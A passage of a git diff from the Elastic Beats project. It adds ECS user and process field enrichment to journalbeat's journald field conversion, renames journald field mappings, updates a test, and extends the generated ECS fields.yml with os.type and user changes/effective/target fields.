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" } diff --git a/journalbeat/pkg/journalfield/conv.go b/journalbeat/pkg/journalfield/conv.go index 47214c3f91d9..703a1c677f61 100644 --- a/journalbeat/pkg/journalfield/conv.go +++ b/journalbeat/pkg/journalfield/conv.go @@ -19,6 +19,7 @@ package journalfield import ( "fmt" + "regexp" "strconv" "strings" @@ -84,7 +85,7 @@ func (c *Converter) Convert(entryFields map[string]string) common.MapStr { fields.Put("journald.custom", custom) } - return fields + return withECSEnrichment(fields) } func convertValue(fc Conversion, value string) (interface{}, error) { @@ -106,6 +107,91 @@ func convertValue(fc Conversion, value string) (interface{}, error) { return value, nil } +func withECSEnrichment(fields common.MapStr) common.MapStr { + // from https://www.freedesktop.org/software/systemd/man/systemd.journal-fields.html + // we see journald.object fields are populated by systemd on behalf of a different program + // so we want them to favor their use in root fields as they are the from the effective program + // performing the action. + setGidUidFields("journald", fields) + setGidUidFields("journald.object", fields) + setProcessFields("journald", fields) + setProcessFields("journald.object", fields) + return fields +} + +func setGidUidFields(prefix string, fields common.MapStr) { + var auditLoginUid string + if found, _ := fields.HasKey(prefix + ".audit.login_uid"); found { + auditLoginUid = fmt.Sprint(getIntegerFromFields(prefix+".audit.login_uid", fields)) + fields.Put("user.id", auditLoginUid) + } + + if found, _ := fields.HasKey(prefix + ".uid"); !found { + return + } + + uid := fmt.Sprint(getIntegerFromFields(prefix+".uid", fields)) + gid := fmt.Sprint(getIntegerFromFields(prefix+".gid", fields)) + if auditLoginUid != "" && auditLoginUid != uid { + putStringIfNotEmtpy("user.effective.id", uid, fields) + putStringIfNotEmtpy("user.effective.group.id", gid, fields) + } else { + putStringIfNotEmtpy("user.id", uid, fields) + putStringIfNotEmtpy("user.group.id", gid, fields) + } +} + +var cmdlineRegexp = regexp.MustCompile(`"(\\"|[^"])*?"|[^\s]+`) + +func setProcessFields(prefix string, fields common.MapStr) { + if found, _ := fields.HasKey(prefix + ".pid"); found { + pid := getIntegerFromFields(prefix+".pid", fields) + fields.Put("process.pid", pid) + } + + name := getStringFromFields(prefix+".name", fields) + if name != "" { + fields.Put("process.name", name) + } + + executable := getStringFromFields(prefix+".executable", fields) + if executable != "" { + fields.Put("process.executable", executable) + } + + cmdline := getStringFromFields(prefix+".process.command_line", fields) + if cmdline == "" { + return + } + + fields.Put("process.command_line", cmdline) + + args := cmdlineRegexp.FindAllString(cmdline, -1) + if len(args) > 0 { + fields.Put("process.args", args) + fields.Put("process.args_count", len(args)) + } +} + +func getStringFromFields(key string, fields common.MapStr) string { + value, _ := fields.GetValue(key) + str, _ := value.(string) + return str +} + +func getIntegerFromFields(key string, fields common.MapStr) int64 { + value, _ := fields.GetValue(key) + i, _ := value.(int64) + return i +} + +func putStringIfNotEmtpy(k, v string, fields common.MapStr) { + if v == "" { + return + } + fields.Put(k, v) +} + // helpers for creating a field conversion table. var ignoredField = Conversion{Dropped: true} diff --git a/journalbeat/pkg/journalfield/conv_test.go b/journalbeat/pkg/journalfield/conv_test.go index a6514a955455..6625d8e1dc10 100644 --- a/journalbeat/pkg/journalfield/conv_test.go +++ b/journalbeat/pkg/journalfield/conv_test.go @@ -39,8 +39,10 @@ func TestConversion(t *testing.T) { sdjournal.SD_JOURNAL_FIELD_BOOT_ID: "123456", }, want: common.MapStr{ - "host": common.MapStr{ - "boot_id": "123456", + "journald": common.MapStr{ + "host": common.MapStr{ + "boot_id": "123456", + }, }, }, }, diff --git a/journalbeat/pkg/journalfield/default.go b/journalbeat/pkg/journalfield/default.go index a8b3860e9561..7c852a44c53a 100644 --- a/journalbeat/pkg/journalfield/default.go +++ b/journalbeat/pkg/journalfield/default.go @@ -28,9 +28,9 @@ var journaldEventFields = FieldConversion{ "COREDUMP_USER_UNIT": text("journald.coredump.user_unit"), "OBJECT_AUDIT_LOGINUID": integer("journald.object.audit.login_uid"), "OBJECT_AUDIT_SESSION": integer("journald.object.audit.session"), - "OBJECT_CMDLINE": text("journald.object.cmd"), - "OBJECT_COMM": text("journald.object.name"), - "OBJECT_EXE": text("journald.object.executable"), + "OBJECT_CMDLINE": text("journald.object.process.command_line"), + "OBJECT_COMM": text("journald.object.process.name"), + "OBJECT_EXE": text("journald.object.process.executable"), "OBJECT_GID": integer("journald.object.gid"), "OBJECT_PID": integer("journald.object.pid"), "OBJECT_SYSTEMD_OWNER_UID": integer("journald.object.systemd.owner_uid"), @@ -45,21 +45,21 @@ var journaldEventFields = FieldConversion{ "_UDEV_DEVLINK": text("journald.kernel.device_symlinks"), "_UDEV_DEVNODE": text("journald.kernel.device_node_path"), "_UDEV_SYSNAME": text("journald.kernel.device_name"), - sdjournal.SD_JOURNAL_FIELD_AUDIT_LOGINUID: integer("process.audit.login_uid"), - sdjournal.SD_JOURNAL_FIELD_AUDIT_SESSION: text("process.audit.session"), - sdjournal.SD_JOURNAL_FIELD_BOOT_ID: text("host.boot_id"), - sdjournal.SD_JOURNAL_FIELD_CAP_EFFECTIVE: text("process.capabilites"), - sdjournal.SD_JOURNAL_FIELD_CMDLINE: text("process.cmd"), + sdjournal.SD_JOURNAL_FIELD_AUDIT_LOGINUID: integer("journald.audit.login_uid"), + sdjournal.SD_JOURNAL_FIELD_AUDIT_SESSION: text("journald.audit.session"), + sdjournal.SD_JOURNAL_FIELD_BOOT_ID: text("journald.host.boot_id"), + sdjournal.SD_JOURNAL_FIELD_CAP_EFFECTIVE: text("journald.process.capabilites"), + sdjournal.SD_JOURNAL_FIELD_CMDLINE: text("journald.process.command_line"), sdjournal.SD_JOURNAL_FIELD_CODE_FILE: text("journald.code.file"), sdjournal.SD_JOURNAL_FIELD_CODE_FUNC: text("journald.code.func"), sdjournal.SD_JOURNAL_FIELD_CODE_LINE: integer("journald.code.line"), - sdjournal.SD_JOURNAL_FIELD_COMM: text("process.name"), - sdjournal.SD_JOURNAL_FIELD_EXE: text("process.executable"), - sdjournal.SD_JOURNAL_FIELD_GID: integer("process.uid"), + sdjournal.SD_JOURNAL_FIELD_COMM: text("journald.process.name"), + sdjournal.SD_JOURNAL_FIELD_EXE: text("journald.process.executable"), + sdjournal.SD_JOURNAL_FIELD_GID: integer("journald.gid"), sdjournal.SD_JOURNAL_FIELD_HOSTNAME: text("host.hostname"), sdjournal.SD_JOURNAL_FIELD_MACHINE_ID: text("host.id"), sdjournal.SD_JOURNAL_FIELD_MESSAGE: text("message"), - sdjournal.SD_JOURNAL_FIELD_PID: integer("process.pid"), + sdjournal.SD_JOURNAL_FIELD_PID: integer("journald.pid"), sdjournal.SD_JOURNAL_FIELD_PRIORITY: integer("syslog.priority", "log.syslog.priority"), sdjournal.SD_JOURNAL_FIELD_SYSLOG_FACILITY: integer("syslog.facility", "log.syslog.facility.name"), sdjournal.SD_JOURNAL_FIELD_SYSLOG_IDENTIFIER: text("syslog.identifier"), @@ -71,7 +71,7 @@ var journaldEventFields = FieldConversion{ sdjournal.SD_JOURNAL_FIELD_SYSTEMD_UNIT: text("systemd.unit"), sdjournal.SD_JOURNAL_FIELD_SYSTEMD_USER_UNIT: text("systemd.user_unit"), sdjournal.SD_JOURNAL_FIELD_TRANSPORT: text("systemd.transport"), - sdjournal.SD_JOURNAL_FIELD_UID: integer("process.uid"), + sdjournal.SD_JOURNAL_FIELD_UID: integer("journald.uid"), // docker journald fields from: https://docs.docker.com/config/containers/logging/journald/ "CONTAINER_ID": text("container.id_truncated"), diff --git a/journalbeat/pkg/journalfield/default_other.go b/journalbeat/pkg/journalfield/default_other.go index ca3d26c92668..5e25ccbf1340 100644 --- a/journalbeat/pkg/journalfield/default_other.go +++ b/journalbeat/pkg/journalfield/default_other.go @@ -26,9 +26,9 @@ var journaldEventFields = FieldConversion{ "COREDUMP_USER_UNIT": text("journald.coredump.user_unit"), "OBJECT_AUDIT_LOGINUID": integer("journald.object.audit.login_uid"), "OBJECT_AUDIT_SESSION": integer("journald.object.audit.session"), - "OBJECT_CMDLINE": text("journald.object.cmd"), - "OBJECT_COMM": text("journald.object.name"), - "OBJECT_EXE": text("journald.object.executable"), + "OBJECT_CMDLINE": text("journald.object.process.command_line"), + "OBJECT_COMM": text("journald.object.process.name"), + "OBJECT_EXE": text("journald.object.process.executable"), "OBJECT_GID": integer("journald.object.gid"), "OBJECT_PID": integer("journald.object.pid"), "OBJECT_SYSTEMD_OWNER_UID": integer("journald.object.systemd.owner_uid"), diff --git a/libbeat/_meta/fields.ecs.yml b/libbeat/_meta/fields.ecs.yml index e3bfd964a51b..d3e0aeda3b64 100644 --- a/libbeat/_meta/fields.ecs.yml +++ b/libbeat/_meta/fields.ecs.yml @@ -1,5 +1,5 @@ # WARNING! Do not edit this file directly, it was generated by the ECS project, -# based on ECS version 1.7.0. +# based on ECS version 1.8.0-dev. # Please visit https://github.com/elastic/ecs to suggest changes to ECS fields. - key: ecs @@ -1356,7 +1356,8 @@ description: 'Raw text message of entire event. Used to demonstrate log integrity. This field is not indexed and doc_values are disabled. It cannot be searched, - but it can be retrieved from `_source`.' + but it can be retrieved from `_source`. If users wish to override this and + index this field, consider using the wildcard data type.' example: Sep 19 08:26:10 host CEF:0|Security| threatmanager|1.0|100| worm successfully stopped|10|src=10.0.0.1 dst=2.1.2.2spt=1232 index: false @@ -1413,7 +1414,7 @@ ignore_above: 1024 description: 'Reference URL linking to additional information about this event. - This URL links to a static definition of the this event. Alert events, indicated + This URL links to a static definition of this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field.' example: https://system.example.com/event/#0001234 default_field: false @@ -2214,6 +2215,21 @@ ignore_above: 1024 description: Operating system platform (such centos, ubuntu, windows). example: darwin + - name: os.type + level: extended + type: keyword + ignore_above: 1024 + description: 'Use the `os.type` field to categorize the operating system into + one of the broad commercial families. + + One of these following values should be used (lowercase): linux, macos, unix, + windows. + + If the OS you''re dealing with is not in the list, the field should not be + populated. Please let us know by opening an issue with ECS, to propose its + addition.' + example: macos + default_field: false - name: os.version level: extended type: keyword @@ -2973,6 +2989,21 @@ ignore_above: 1024 description: Operating system platform (such centos, ubuntu, windows). example: darwin + - name: os.type + level: extended + type: keyword + ignore_above: 1024 + description: 'Use the `os.type` field to categorize the operating system into + one of the broad commercial families. + + One of these following values should be used (lowercase): linux, macos, unix, + windows. + + If the OS you''re dealing with is not in the list, the field should not be + populated. Please let us know by opening an issue with ECS, to propose its + addition.' + example: macos + default_field: false - name: os.version level: extended type: keyword @@ -3081,6 +3112,21 @@ ignore_above: 1024 description: Operating system platform (such centos, ubuntu, windows). example: darwin + - name: type + level: extended + type: keyword + ignore_above: 1024 + description: 'Use the `os.type` field to categorize the operating system into + one of the broad commercial families. + + One of these following values should be used (lowercase): linux, macos, unix, + windows. + + If the OS you''re dealing with is not in the list, the field should not be + populated. Please let us know by opening an issue with ECS, to propose its + addition.' + example: macos + default_field: false - name: version level: extended type: keyword @@ -5296,7 +5342,11 @@ description: 'Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain - name. In this case, the IP address would go to the `domain` field.' + name. In this case, the IP address would go to the `domain` field. + + If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC + 2732), the `[` and `]` characters should also be captured in the `domain` + field.' example: www.elastic.co - name: extension level: extended @@ -5437,6 +5487,85 @@ provide an array that includes all of them.' type: group fields: + - name: changes.domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the directory the user is a member of. + + For example, an LDAP or Active Directory domain name.' + default_field: false + - name: changes.email + level: extended + type: keyword + ignore_above: 1024 + description: User email address. + default_field: false + - name: changes.full_name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + description: User's full name, if available. + example: Albert Einstein + default_field: false + - name: changes.group.domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the directory the group is a member of. + + For example, an LDAP or Active Directory domain name.' + default_field: false + - name: changes.group.id + level: extended + type: keyword + ignore_above: 1024 + description: Unique identifier for the group on the system/platform. + default_field: false + - name: changes.group.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the group. + default_field: false + - name: changes.hash + level: extended + type: keyword + ignore_above: 1024 + description: 'Unique user hash to correlate information for a user in anonymized + form. + + Useful if `user.id` or `user.name` contain confidential information and cannot + be used.' + default_field: false + - name: changes.id + level: core + type: keyword + ignore_above: 1024 + description: Unique identifier of the user. + default_field: false + - name: changes.name + level: core + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + description: Short name or login of the user. + example: albert + default_field: false + - name: changes.roles + level: extended + type: keyword + ignore_above: 1024 + description: Array of user roles at the time of the event. + example: '["kibana_admin", "reporting_user"]' + default_field: false - name: domain level: extended type: keyword @@ -5444,6 +5573,85 @@ description: 'Name of the directory the user is a member of. For example, an LDAP or Active Directory domain name.' + - name: effective.domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the directory the user is a member of. + + For example, an LDAP or Active Directory domain name.' + default_field: false + - name: effective.email + level: extended + type: keyword + ignore_above: 1024 + description: User email address. + default_field: false + - name: effective.full_name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + description: User's full name, if available. + example: Albert Einstein + default_field: false + - name: effective.group.domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the directory the group is a member of. + + For example, an LDAP or Active Directory domain name.' + default_field: false + - name: effective.group.id + level: extended + type: keyword + ignore_above: 1024 + description: Unique identifier for the group on the system/platform. + default_field: false + - name: effective.group.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the group. + default_field: false + - name: effective.hash + level: extended + type: keyword + ignore_above: 1024 + description: 'Unique user hash to correlate information for a user in anonymized + form. + + Useful if `user.id` or `user.name` contain confidential information and cannot + be used.' + default_field: false + - name: effective.id + level: core + type: keyword + ignore_above: 1024 + description: Unique identifier of the user. + default_field: false + - name: effective.name + level: core + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + description: Short name or login of the user. + example: albert + default_field: false + - name: effective.roles + level: extended + type: keyword + ignore_above: 1024 + description: Array of user roles at the time of the event. + example: '["kibana_admin", "reporting_user"]' + default_field: false - name: email level: extended type: keyword @@ -5509,6 +5717,85 @@ description: Array of user roles at the time of the event. example: '["kibana_admin", "reporting_user"]' default_field: false + - name: target.domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the directory the user is a member of. + + For example, an LDAP or Active Directory domain name.' + default_field: false + - name: target.email + level: extended + type: keyword + ignore_above: 1024 + description: User email address. + default_field: false + - name: target.full_name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + description: User's full name, if available. + example: Albert Einstein + default_field: false + - name: target.group.domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the directory the group is a member of. + + For example, an LDAP or Active Directory domain name.' + default_field: false + - name: target.group.id + level: extended + type: keyword + ignore_above: 1024 + description: Unique identifier for the group on the system/platform. + default_field: false + - name: target.group.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the group. + default_field: false + - name: target.hash + level: extended + type: keyword + ignore_above: 1024 + description: 'Unique user hash to correlate information for a user in anonymized + form. + + Useful if `user.id` or `user.name` contain confidential information and cannot + be used.' + default_field: false + - name: target.id + level: core + type: keyword + ignore_above: 1024 + description: Unique identifier of the user. + default_field: false + - name: target.name + level: core + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + description: Short name or login of the user. + example: albert + default_field: false + - name: target.roles + level: extended + type: keyword + ignore_above: 1024 + description: Array of user roles at the time of the event. + example: '["kibana_admin", "reporting_user"]' + default_field: false 